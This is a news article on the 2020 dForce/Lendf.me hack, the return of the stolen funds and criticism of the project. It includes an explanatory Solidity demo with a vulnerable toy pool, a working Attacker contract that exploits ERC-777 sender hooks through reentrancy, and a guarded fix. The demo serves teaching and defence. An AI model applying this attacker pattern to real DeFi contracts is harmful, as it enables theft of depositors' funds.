DForce Hacker Returns Stolen Money as Criticism of the Project Continues

Published at: April 22, 2020

The hacker who stole $25 million in crypto on April 19 from the decentralized finance (DeFi) protocol dForce has since returned the money. Most signs indicate that this was because the hacker accidentally leaked data that could have led to their identity being discovered. dForce has not issued any clarifying statements, despite mounting criticism of its security practices.

Etherscan data shows that on April 21, the hacker emptied all tokens obtained from the hack into an address labeled "Lendf.me admin." Lendf.me is the specific lending platform within the dForce network that was attacked.

Mindao Yang, the founder of dForce, confirmed that the funds were returned and that they will be redistributed to their rightful owners.

But while a happy ending for the victims of the attack appears to be in sight, many community members are raising their voices to criticize the project.

A clone of another platform

In the DeFi community, dForce is considered by many to be a clone of another, better known platform called Compound.

Anthony Sassano, co-founder of Ethhub, posted an ironic tweet after the events:

“Now that the hacker has returned the funds to dForce it's time for dForce to return Compound's code.”

Taylor Monahan, CEO of Ethereum wallet company mycrypto.com, told Cointelegraph a similar story:

“dForce is apparently a pretty basic clone of the older Compound contracts, except that they enabled some tokens that Compound did not.”

Criticism from Brian Kerr, CEO of multi-platform DeFi project Kava Labs, was even harsher:

“The dForce team copied code they did not understand from Compound, illegally deployed it as their own while changing a few parts without realizing the security issues, and then they heavily marketed it to the world without first running very basic audits.”

As Monahan explained, dForce had enabled an ERC-777 token, and that standard's transfer hooks are what allowed the "reentrancy attack" to occur: the hooks let the token holder's contract run its own code in the middle of a transfer, which the attacker used to call back into the lending contract before it had finished updating its books. She stressed that this is a feature, not a bug, of the standard. "However, if used in certain systems, it becomes a bug in that system," she added.
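To make the mechanism concrete, here is an added, hypothetical Solidity illustration written for this article; it is not dForce's, Lendf.me's or Compound's code. A toy ERC-777-style token calls the sender's `tokensToSend` hook before it moves balances, exactly as the standard specifies, and a Compound-v1-style pool writes its accounting only after the token call returns. The attacker contract uses the hook to withdraw mid-deposit, and the pool's stale write then credits it twice. A hardened pool with effects-before-interactions and a reentrancy guard sits alongside. All contract names, the `Demo` funding amounts and the simplifications noted in the comments (no allowances, no ERC-1820 registry lookup) are assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// ERC-777 notifies the token *sender* through this hook before balances move.
interface ITokensToSend {
    function tokensToSend(address operator, address from, address to, uint256 amount,
                          bytes calldata userData, bytes calldata operatorData) external;
}

// Toy ERC-777-style token. Assumed simplifications: no allowances, hook called for any
// contract sender (real ERC-777 consults ERC-1820), recipients not notified.
contract HookedToken {
    mapping(address => uint256) public balanceOf;
    constructor(address to, uint256 amount) { balanceOf[to] = amount; }
    function transfer(address to, uint256 amount) external returns (bool) {
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;
        return true;
    }
    function transferFrom(address from, address to, uint256 amount) external returns (bool) {
        if (from.code.length > 0) {  // as in ERC-777: sender hook runs BEFORE balances move
            ITokensToSend(from).tokensToSend(msg.sender, from, to, amount, "", "");
        }
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }
}

// Vulnerable pool (hypothetical, Compound-v1-style): compute the new balance, call out to
// the token, then write the precomputed value. Whatever the hook did to `supplied` is lost.
contract VulnerablePool {
    HookedToken public immutable token;
    mapping(address => uint256) public supplied;
    constructor(HookedToken t) { token = t; }
    function supply(uint256 amount) external {
        uint256 updated = supplied[msg.sender] + amount;                 // read
        require(token.transferFrom(msg.sender, address(this), amount)); // interaction
        supplied[msg.sender] = updated;                                  // stale write
    }
    function withdraw(uint256 amount) external {
        require(supplied[msg.sender] >= amount, "insufficient");
        supplied[msg.sender] -= amount;
        require(token.transfer(msg.sender, amount));
    }
}

// Hardened pool: effects before interactions, and a guard so the hook cannot re-enter.
contract SafePool {
    HookedToken public immutable token;
    mapping(address => uint256) public supplied;
    bool private locked;
    modifier nonReentrant() { require(!locked, "reentrant"); locked = true; _; locked = false; }
    constructor(HookedToken t) { token = t; }
    function supply(uint256 amount) external nonReentrant {
        supplied[msg.sender] += amount;                                  // effect first
        require(token.transferFrom(msg.sender, address(this), amount)); // then interaction
    }
    function withdraw(uint256 amount) external nonReentrant {
        supplied[msg.sender] -= amount;                                  // reverts on underflow
        require(token.transfer(msg.sender, amount));
    }
}

// Attacker: one honest deposit, then a second one during which the hook withdraws the
// first. The outer supply() then credits 2*amount although only `amount` stayed in the pool.
contract Attacker is ITokensToSend {
    VulnerablePool public immutable pool;
    HookedToken public immutable token;
    bool private armed;
    constructor(VulnerablePool p, HookedToken t) { pool = p; token = t; }
    function attack(uint256 amount) external {
        pool.supply(amount);        // honest: supplied == amount
        armed = true;
        pool.supply(amount);        // hook withdraws `amount`; outer call writes 2*amount
        pool.withdraw(2 * amount);  // takes `amount` of other depositors' liquidity
    }
    function tokensToSend(address, address, address, uint256 amount,
                          bytes calldata, bytes calldata) external override {
        require(msg.sender == address(token));
        if (armed) { armed = false; pool.withdraw(amount); }
    }
}

// Deploying this runs the scenario; `stolen` ends up equal to the 100e18 passed to attack().
contract Demo {
    uint256 public stolen;
    constructor() {
        HookedToken token = new HookedToken(address(this), 1000e18);
        VulnerablePool pool = new VulnerablePool(token);
        Attacker attacker = new Attacker(pool, token);
        token.transfer(address(pool), 500e18);     // stands in for other users' deposits
        token.transfer(address(attacker), 200e18);
        attacker.attack(100e18);
        stolen = token.balanceOf(address(attacker)) - 200e18;
    }
}
```

Compile with any solc 0.8.x and deploy `Demo`; reading `stolen()` returns 100e18, the amount taken from the liquidity that belonged to other depositors. Point `Attacker` at `SafePool` instead and the whole transaction reverts with "reentrant", because the hook's `withdraw` call hits the guard while `supply` still holds the lock; even without the guard, writing `supplied` before the external call means there is no stale value left to overwrite. The point Monahan makes is visible in the code: the hook is ordinary ERC-777 behaviour, and the bug is entirely in a pool that performs its external call before its state write.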

A well known issue

The reentrancy attack is not new. A similar issue led to the infamous DAO hack in 2016.

In July 2019, the same issue had already been identified in the Uniswap decentralized exchange. Monahan said that this "feature/bug was exploited two days previous in another system." This was a reference to Uniswap itself, which suffered a loss of around $300,000 on April 18, the day before the dForce attack. The culprit was the same imBTC token responsible for the dForce hack; it had been added by Uniswap community members despite warnings to the contrary.

The combination of these factors led to a summary judgement from Monahan:

“The ways all of this indicates that dForce is incompetent is that they 1) didn't write their own code but re-used someone else's code in a way prohibited by that code's license and 2) failed to address an issue that came to light once again in very recent days.”

Kerr was more candid:

“I don’t like to say bad things about others usually, hacks can happen to any team, but the dForce incident is particularly bad. The fault is both on the dForce team and the users. dForce didn’t understand what they were doing and marketed an unsafe product. The users didn’t do their own due diligence on the team or the code base to make sure it’s safe.”

dForce is seeking to rectify these issues. Yang took personal responsibility for failing to foresee the hack, and the company is completely disabling the vulnerable smart contracts.

While the company has yet to provide its own official account of events, it seems that its users were lucky in their misfortune: the hacker did not know how to cover their tracks.

The event was briefly the largest hack in DeFi's short history. Given how simple the attack was, it shows that the security practices used in the space still need to mature.
